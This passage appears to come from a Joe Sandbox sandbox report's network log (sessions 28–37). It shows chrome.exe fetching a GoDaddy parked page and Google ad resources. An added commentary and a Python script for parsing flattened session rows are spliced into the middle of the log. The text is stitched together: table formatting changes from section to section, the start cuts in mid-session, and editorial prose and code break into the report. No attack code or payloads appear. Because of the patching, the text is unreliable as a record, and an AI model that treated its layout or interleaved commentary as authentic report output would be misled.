                                                                          Date: Thu, 29 Aug 2024 15:12:25 GMT
                                                                          Server: gws
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                           29 | 192.168.2.5 | 53790 | 54.174.215.77 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                           2024-08-29 15:12:25 UTC | 646 | OUT | POST /v1/parkingEvents?abp=1&gdabp=true HTTP/1.1
                                                                          Host: api.aws.parking.godaddy.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 920
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Content-Type: application/json
                                                                          Accept: */*
                                                                          Origin: https://www.onefordvd.com
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                           2024-08-29 15:12:25 UTC | 920 | OUT | Data Raw: 7b 22 65 76 65 6e 74 54 79 70 65 22 3a 22 56 49 53 49 54 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 38 2d 32 39 54 31 35 3a 31 32 3a 32 32 2e 37 39 33 5a 22 2c 22 64 6f 6d 61 69 6e 22 3a 22 6f 6e 65 66 6f 72 64 76 64 2e 63 6f 6d 22 2c 22 64 6f 6d 61 69 6e 53 74 61 74 75 73 22 3a 22 41 43 54 49 56 45 22 2c 22 73 79 73 74 65 6d 22 3a 22 53 4e 22 2c 22 64 61 74 61 53 6f 75 72 63 65 22 3a 22 49 4e 56 45 4e 54 4f 52 59 22 2c 22 69 73 54 75 72 6e 4b 65 79 52 65 73 65 6c 6c 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 43 6e 61 6d 65 22 3a 66 61 6c 73 65 2c 22 61 63 63 6f 75 6e 74 22 3a 22 31 31 64 31 64 65 66 35 33 34 65 61 31 62 65 30 58 34 33 31 36 32 39 33 66 58 31 35 62 63 62 63 65 35 31 30 62 58 58 32 66 38 65 20 22 2c 22 63 75 73 74 6f 6d 65
                                                                          Data Ascii: {"eventType":"VISIT","createdAt":"2024-08-29T15:12:22.793Z","domain":"onefordvd.com","domainStatus":"ACTIVE","system":"SN","dataSource":"INVENTORY","isTurnKeyReseller":false,"isCname":false,"account":"11d1def534ea1be0X4316293fX15bcbce510bXX2f8e ","custome
                                                                           2024-08-29 15:12:25 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:25 GMT
                                                                          Content-Type: text/plain
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          Set-Cookie: AWSALB=WSfU3Zvt1dnVYhYsTOvZDl/S2Zs3d+wkJrCR9MuV7akpIbTa6IjMMcG6LroATngmGT/8gKxe03/8BToaJ3cwqb/HoUfjLaHXwDH8mOp8jhJ1Kbunhvkz9JlcTMoM; Expires=Thu, 05 Sep 2024 15:12:25 GMT; Path=/
                                                                          Set-Cookie: AWSALBCORS=WSfU3Zvt1dnVYhYsTOvZDl/S2Zs3d+wkJrCR9MuV7akpIbTa6IjMMcG6LroATngmGT/8gKxe03/8BToaJ3cwqb/HoUfjLaHXwDH8mOp8jhJ1Kbunhvkz9JlcTMoM; Expires=Thu, 05 Sep 2024 15:12:25 GMT; Path=/; SameSite=None; Secure
                                                                          access-control-allow-origin: *


                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                           30 | 192.168.2.5 | 53792 | 54.174.215.77 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                           2024-08-29 15:12:26 UTC | 646 | OUT | POST /v1/parkingEvents?abp=1&gdabp=true HTTP/1.1
                                                                          Host: api.aws.parking.godaddy.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 935
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Content-Type: application/json
                                                                          Accept: */*
                                                                          Origin: https://www.onefordvd.com
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                           2024-08-29 15:12:26 UTC | 935 | OUT | Data Raw: 7b 22 65 76 65 6e 74 54 79 70 65 22 3a 22 56 49 53 49 54 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 38 2d 32 39 54 31 35 3a 31 32 3a 32 34 2e 38 34 39 5a 22 2c 22 64 6f 6d 61 69 6e 22 3a 22 6f 6e 65 66 6f 72 64 76 64 2e 63 6f 6d 22 2c 22 64 6f 6d 61 69 6e 53 74 61 74 75 73 22 3a 22 41 43 54 49 56 45 22 2c 22 73 79 73 74 65 6d 22 3a 22 53 4e 22 2c 22 64 61 74 61 53 6f 75 72 63 65 22 3a 22 49 4e 56 45 4e 54 4f 52 59 22 2c 22 69 73 54 75 72 6e 4b 65 79 52 65 73 65 6c 6c 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 43 6e 61 6d 65 22 3a 66 61 6c 73 65 2c 22 61 63 63 6f 75 6e 74 22 3a 22 31 31 64 31 64 65 66 35 33 34 65 61 31 62 65 30 58 34 33 31 36 32 39 33 66 58 31 35 62 63 62 63 65 35 31 30 62 58 58 32 66 38 65 20 22 2c 22 63 75 73 74 6f 6d 65
                                                                          Data Ascii: {"eventType":"VISIT","createdAt":"2024-08-29T15:12:24.849Z","domain":"onefordvd.com","domainStatus":"ACTIVE","system":"SN","dataSource":"INVENTORY","isTurnKeyReseller":false,"isCname":false,"account":"11d1def534ea1be0X4316293fX15bcbce510bXX2f8e ","custome
                                                                           2024-08-29 15:12:26 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:26 GMT
                                                                          Content-Type: text/plain
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          Set-Cookie: AWSALB=G9CxwZsmSUZSdkZbx3J2QTzg034P4mD02GBmgzBP6U5uWGlEN3NO+cEAV8VcSjGHFptZ8oPajZX4wgNlXo9IMxeR217/nrHX7P2Qy3UUzeGmf2zMN++dciy1FiK1; Expires=Thu, 05 Sep 2024 15:12:26 GMT; Path=/
                                                                          Set-Cookie: AWSALBCORS=G9CxwZsmSUZSdkZbx3J2QTzg034P4mD02GBmgzBP6U5uWGlEN3NO+cEAV8VcSjGHFptZ8oPajZX4wgNlXo9IMxeR217/nrHX7P2Qy3UUzeGmf2zMN++dciy1FiK1; Expires=Thu, 05 Sep 2024 15:12:26 GMT; Path=/; SameSite=None; Secure
                                                                          access-control-allow-origin: *


                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                           31 | 192.168.2.5 | 53793 | 172.217.16.206 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                           2024-08-29 15:12:26 UTC | 881 | OUT | GET /afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=lhb5r7xl5det&aqid=1Y_QZrGTL9KnjuwPiPe1wA0&psid=7621175430&pbt=bv&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=4%7C0%7C1541%7C1243%7C284&lle=0&ifv=1&hpt=0 HTTP/1.1
                                                                          Host: syndicatedsearch.goog
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                           2024-08-29 15:12:26 UTC | 715 | IN | HTTP/1.1 204 No Content
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-l4l9aFliiLF4r_OFFJoPkw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                          Permissions-Policy: unload=()
                                                                          Date: Thu, 29 Aug 2024 15:12:26 GMT
                                                                          Server: gws
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
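
Sessions 28 to 31 above, and session 32 below, all show the same thing: chrome.exe (PID 4040) loading a GoDaddy parking page (www.onefordvd.com) and its Google ad syndication, which is browser background traffic and not something attributable to sxs.exe. Confirming that mechanically is harder than it looks once a report like this is scraped to plain text, because the Session table's columns run together into one digit string (session ID, source IP, source port, destination IP, destination port and PID, e.g. 28192.168.2.553747172.217.16.2064434040), and the digit boundaries are genuinely ambiguous: 192.168.2.5:53747 and 192.168.2.55:3747 are both well-formed readings of the same characters. The Python below is an added example, not Joe Sandbox code and not output from this report. It enumerates every internally valid reading of such a row and shows how analyst-supplied constraints narrow them down. Those constraints (192.168.2.5 as the analysis VM's address, 4040 as the chrome.exe PID from the process tree, 443 as the expected destination port, and the two peer addresses) are assumptions read off these sessions, not facts the excerpt states. The session rows are copied from sessions 28 to 32 as flattened text; the two Data rows are copied from session 28 with their payloads truncated.

```python
"""Recover column boundaries from flattened Joe Sandbox network-session rows.
Added example; not Joe Sandbox code.  Sample rows are copied from this
report's Session and Data tables (sessions 28-32); payloads are truncated."""
import re
from ipaddress import IPv4Address
from itertools import product

# Session rows exactly as they appear once the HTML table is flattened to text.
SESSION_ROWS = [
    r"28192.168.2.553747172.217.16.2064434040C:\Program Files\Google\Chrome\Application\chrome.exe",
    r"29192.168.2.55379054.174.215.774434040C:\Program Files\Google\Chrome\Application\chrome.exe",
    r"30192.168.2.55379254.174.215.774434040C:\Program Files\Google\Chrome\Application\chrome.exe",
    r"31192.168.2.553793172.217.16.2064434040C:\Program Files\Google\Chrome\Application\chrome.exe",
    r"32192.168.2.55379754.174.215.774434040C:\Program Files\Google\Chrome\Application\chrome.exe",
]
# Data rows from session 28: request line (truncated) and first 21 bytes of the response body.
DATA_ROW_OUT = "2024-08-29 15:12:25 UTC880OUTGET /afs/gen_204?client=dp-namemedia06_3ph HTTP/1.1"
DATA_ROW_IN = ("2024-08-29 15:12:25 UTC591INData Raw: "
               "2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d")
# Analyst-supplied constraints.  ASSUMPTIONS read off these sessions (VM address,
# chrome.exe PID, HTTPS port, peer addresses), not facts stated by the excerpt.
CONSTRAINTS = dict(src_ip="192.168.2.5", known_pids={4040}, dst_ports={443},
                   dst_ips={"172.217.16.206", "54.174.215.77"})

def _field(s, lo, hi, max_len):
    """s is a printed integer in [lo, hi]: 1..max_len digits, no leading zero."""
    return 1 <= len(s) <= max_len and (s == "0" or s[0] != "0") and lo <= int(s) <= hi

def _splits(s, prefix_lengths):
    """Cut s into consecutive pieces: each prefix piece tries every length in
    its range, the final piece takes the (non-empty) remainder."""
    for lens in product(*prefix_lengths):
        if sum(lens) < len(s):
            pieces, cut = [], 0
            for n in lens:
                pieces.append(s[cut:cut + n])
                cut += n
            pieces.append(s[cut:])
            yield pieces

def candidate_splits(row, src_ip=None, known_pids=None, dst_ports=None, dst_ips=None):
    """Every internally valid reading of a flattened Session row, pruned by
    whichever constraints are given.  Validity alone is rarely enough."""
    m = re.match(r"^([0-9.]+)([^0-9.].*)$", row)
    if not m:
        raise ValueError("row must be digits/dots followed by a process path")
    numeric, process = m.groups()
    parts = numeric.split(".")
    if len(parts) != 7:  # two dotted quads leave exactly six dots
        raise ValueError("expected two IPv4 addresses in the row")
    head, o2, o3, mid, d2, d3, tail = parts
    octet = lambda s: _field(s, 0, 255, 3)
    port = lambda s: _field(s, 1, 65535, 5)
    if not all(map(octet, (o2, o3, d2, d3))):
        return []
    found = []
    for sid, o1 in _splits(head, [range(1, len(head))]):                 # id|octet
        if not (_field(sid, 1, 10**9, 12) and octet(o1)):
            continue
        for o4, sport, d1 in _splits(mid, [range(1, 4), range(1, 6)]):  # octet|port|octet
            if not (octet(o4) and port(sport) and octet(d1)):
                continue
            for d4, dport, pid in _splits(tail, [range(1, 4), range(1, 6)]):  # octet|port|pid
                if not (octet(d4) and port(dport) and _field(pid, 0, 10**9, 12)):
                    continue
                src = IPv4Address(f"{o1}.{o2}.{o3}.{o4}")
                dst = IPv4Address(f"{d1}.{d2}.{d3}.{d4}")
                if src_ip and src != IPv4Address(src_ip):
                    continue
                if known_pids and int(pid) not in known_pids:
                    continue
                if dst_ports and int(dport) not in dst_ports:
                    continue
                if dst_ips and str(dst) not in dst_ips:
                    continue
                found.append(dict(session=int(sid), src=str(src), sport=int(sport),
                                  dst=str(dst), dport=int(dport), pid=int(pid), process=process))
    return found

def parse_session_row(row, **constraints):
    """The unique reading, or ValueError stating how many readings remain."""
    readings = candidate_splits(row, **constraints)
    if len(readings) != 1:
        raise ValueError(f"{len(readings)} readings remain; tighten the constraints")
    return readings[0]

def processes(rows, **constraints):
    """(pid, process) pairs over every remaining reading of every row; a single
    pair means attribution is certain even where an address is still ambiguous."""
    return {(r["pid"], r["process"]) for row in rows for r in candidate_splits(row, **constraints)}

DATA_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d UTC)(\d+)(IN|OUT)(.*)$")

def parse_data_row(row):
    """Split a flattened Data row into timestamp, byte count, direction and
    payload; 'Data Raw:' hex is decoded to bytes, anything else kept as text."""
    m = DATA_RE.match(row)
    if not m:
        raise ValueError("not a Timestamp/Bytes/Direction/Data row")
    ts, size, direction, data = m.groups()
    raw = data.startswith("Data Raw:")
    payload = bytes.fromhex(data[len("Data Raw:"):]) if raw else data.encode()
    return dict(timestamp=ts, size=int(size), direction=direction, payload=payload)

if __name__ == "__main__":
    for row in SESSION_ROWS:
        print(len(candidate_splits(row)), "readings unconstrained,",
              len(candidate_splits(row, **CONSTRAINTS)), "under CONSTRAINTS")
    print(processes(SESSION_ROWS, known_pids={4040}), parse_data_row(DATA_ROW_IN)["payload"])
```

Without constraints, row 28 admits 72 readings. Fixing the source address and the PID leaves two (destination port 443 or 6443, both with PID 4040 and destination 172.217.16.206 or 172.217.16.20), and adding the expected port leaves one. Row 30 still has two readings after all three (destination 54.174.215.77 or 254.174.215.77, since 5379 is a valid port and 254 a valid octet), which is why processes() aggregates over every remaining reading instead of demanding uniqueness: the process attribution is certain even where the address is not, and that is the question a triage analyst is actually asking of this table. The byte count in a Data row refers to the full cell, so the truncated hex here decodes to 21 bytes although the row says 591.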


                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                           32 | 192.168.2.5 | 53797 | 54.174.215.77 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                           2024-08-29 15:12:26 UTC | 710 | OUT | GET /v1/parkingEvents?abp=1&gdabp=true HTTP/1.1
                                                                          Host: api.aws.parking.godaddy.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: AWSALB=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; AWSALBCORS=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; cpvisitor=f491361e-23b1-46ad-b955-49e64997c4da
                                                                          2024-08-29 15:12:26 UTC531INHTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:26 GMT
                                                                          Content-Type: text/plain
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          Set-Cookie: AWSALB=B8ow0wf5x4A1hNTfvLGiYW/tCHNg7hFzyF8d4CpzoiCh2ePZQCesSduTSdZXOVbM7pGXx4pEOWXYePx6HUL9VEc+NhFThKocrEXHfDBKvfi6AExIDkbn32QF5p0h; Expires=Thu, 05 Sep 2024 15:12:26 GMT; Path=/
                                                                          Set-Cookie: AWSALBCORS=B8ow0wf5x4A1hNTfvLGiYW/tCHNg7hFzyF8d4CpzoiCh2ePZQCesSduTSdZXOVbM7pGXx4pEOWXYePx6HUL9VEc+NhFThKocrEXHfDBKvfi6AExIDkbn32QF5p0h; Expires=Thu, 05 Sep 2024 15:12:26 GMT; Path=/; SameSite=None; Secure


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
33          192.168.2.5  53796        142.250.186.68   443               4040  C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp: 2024-08-29 15:12:26 UTC | Bytes transferred: 487 | Direction: OUT | Data:
GET /js/bg/qfimbA0GYhgyETKN2gHT05d-Hpg6wiB8plDJ1aMSf3s.js HTTP/1.1
Host: www.google.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Timestamp: 2024-08-29 15:12:27 UTC | Bytes transferred: 807 | Direction: IN | Data:
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/botguard-scs
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="botguard-scs"
Report-To: {"group":"botguard-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/botguard-scs"}]}
Content-Length: 54789
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Thu, 29 Aug 2024 15:12:25 GMT
Expires: Fri, 29 Aug 2025 15:12:25 GMT
Cache-Control: public, max-age=31536000
Last-Modified: Wed, 21 Aug 2024 13:30:00 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Age: 1
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
34          192.168.2.5  53794        142.250.184.193  443               4040  C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp: 2024-08-29 15:12:26 UTC | Bytes transferred: 508 | Direction: OUT | Data:
GET /ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c21 HTTP/1.1
Host: afs.googleusercontent.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Timestamp: 2024-08-29 15:12:27 UTC | Bytes transferred: 796 | Direction: IN | Data:
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Security-Policy: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/afs-native-asset-managers
Cross-Origin-Opener-Policy: same-origin; report-to="afs-native-asset-managers"
Report-To: {"group":"afs-native-asset-managers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/afs-native-asset-managers"}]}
Content-Length: 200
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Thu, 29 Aug 2024 15:12:23 GMT
Expires: Fri, 30 Aug 2024 14:12:23 GMT
Cache-Control: public, max-age=82800
Age: 3
Last-Modified: Thu, 02 Nov 2023 22:48:00 GMT
Content-Type: image/svg+xml
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close

Timestamp: 2024-08-29 15:12:27 UTC | Bytes transferred: 200 | Direction: IN | Data Ascii:
<svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0z" fill="none"/><path d="M5.88 4.12L13.76 12l-7.88 7.88L8 22l10-10L8 2z"/></svg>


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
35          192.168.2.5  53795        142.250.184.193  443               4040  C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp: 2024-08-29 15:12:26 UTC | Bytes transferred: 507 | Direction: OUT | Data:
GET /ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21 HTTP/1.1
Host: afs.googleusercontent.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Timestamp: 2024-08-29 15:12:27 UTC | Bytes transferred: 796 | Direction: IN | Data:
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Security-Policy: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/afs-native-asset-managers
Cross-Origin-Opener-Policy: same-origin; report-to="afs-native-asset-managers"
Report-To: {"group":"afs-native-asset-managers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/afs-native-asset-managers"}]}
Content-Length: 391
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Thu, 29 Aug 2024 15:12:23 GMT
Expires: Fri, 30 Aug 2024 14:12:23 GMT
Cache-Control: public, max-age=82800
Last-Modified: Thu, 20 Jul 2023 22:48:00 GMT
Content-Type: image/svg+xml
Vary: Accept-Encoding
Age: 3
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close

Timestamp: 2024-08-29 15:12:27 UTC | Bytes transferred: 391 | Direction: IN | Data Ascii:
<svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" width="200" height="200" viewBox="0 0 24 24"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
36          192.168.2.5  53798        54.174.215.77    443               4040  C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp: 2024-08-29 15:12:27 UTC | Bytes transferred: 710 | Direction: OUT | Data:
GET /v1/parkingEvents?abp=1&gdabp=true HTTP/1.1
Host: api.aws.parking.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: AWSALB=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; AWSALBCORS=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; cpvisitor=f491361e-23b1-46ad-b955-49e64997c4da

Timestamp: 2024-08-29 15:12:27 UTC | Bytes transferred: 531 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Thu, 29 Aug 2024 15:12:27 GMT
Content-Type: text/plain
Content-Length: 0
Connection: close
Set-Cookie: AWSALB=tQ6UsCCaQyQQAy5Mxg72Esvozbvkh5+V9QRlxqa5z0iXY2YjKXkHeskDnm1yKoNvUXI69MQ1x5UF04KCj0ONTU8d55kzGb6fcupL4Cryb2nndIRUjc1mDMqMKht9; Expires=Thu, 05 Sep 2024 15:12:27 GMT; Path=/
Set-Cookie: AWSALBCORS=tQ6UsCCaQyQQAy5Mxg72Esvozbvkh5+V9QRlxqa5z0iXY2YjKXkHeskDnm1yKoNvUXI69MQ1x5UF04KCj0ONTU8d55kzGb6fcupL4Cryb2nndIRUjc1mDMqMKht9; Expires=Thu, 05 Sep 2024 15:12:27 GMT; Path=/; SameSite=None; Secure


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          37192.168.2.553800172.217.16.2064434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:28 UTC883OUTGET /afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=g3yhpaijmirq&aqid=1o_QZoOUFf6kjuwPko2JoA0&psid=7621175430&pbt=bs&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=11%7C0%7C1627%7C1343%7C1527&lle=0&ifv=1&hpt=0 HTTP/1.1
                                                                          Host: syndicatedsearch.goog
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Timestamp: 2024-08-29 15:12:29 UTC | Bytes transferred: 715 | Direction: IN | Data: HTTP/1.1 204 No Content
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-YyYlOUiY5HN28jS-3pT0eg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                          Permissions-Policy: unload=()
                                                                          Date: Thu, 29 Aug 2024 15:12:28 GMT
                                                                          Server: gws
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


